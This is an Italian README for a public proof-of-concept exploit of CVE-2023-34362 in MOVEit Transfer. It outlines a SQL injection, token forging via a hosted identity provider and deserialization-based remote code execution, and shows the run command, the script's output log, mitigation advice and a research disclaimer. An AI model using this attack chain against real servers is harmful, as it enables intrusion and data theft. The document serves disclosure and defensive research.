
POC per CVE-2023-34362 che colpisce MOVEit Transfer
POC per CVE-2023-34362 che interessa MOVEit Transfer
Un'analisi tecnica della causa principale della vulnerabilità è disponibile sul blog:
Questo POC sfrutta un'iniezione SQL per ottenere un token di accesso API da sysadmin e poi usa tale accesso per abusare di una chiamata di deserializzazione al fine di ottenere l'esecuzione di codice remoto.
Questo POC deve raggiungere un endpoint Identity Provider che ospita certificati RS256 adatti, utilizzati per forgiare token utente arbitrari - di default questo POC utilizza il nostro endpoint IDP ospitato su AWS.
L'exploit scriverà di default un file in C:\Windows\Temp\message.txt. Payload alternativi possono essere generati utilizzando il progetto ysoserial.net.
python CVE-2023-34362.py https://127.0.0.1
[*] Getting sysadmin access token
[*] Got access token
[*] Getting FolderID
[*] Got FolderID: 963611079
[*] Starting file upload
[*] Got FileID: 965943963
[*] Injecting the payload
[*] Payload injected
[*] Triggering payload via resume call
[+] Triggered the payload!
[*] Deleting uploaded file
Aggiorna all'ultima versione o mitiga seguendo le istruzioni contenute nel Progress Advisory
Questo software è stato creato esclusivamente per scopi di ricerca accademica e per lo sviluppo di tecniche difensive efficaci e non è destinato a essere utilizzato per attaccare sistemi se non esplicitamente autorizzati. I maintainer del progetto non sono responsabili dell'uso improprio del software. Usalo con responsabilità.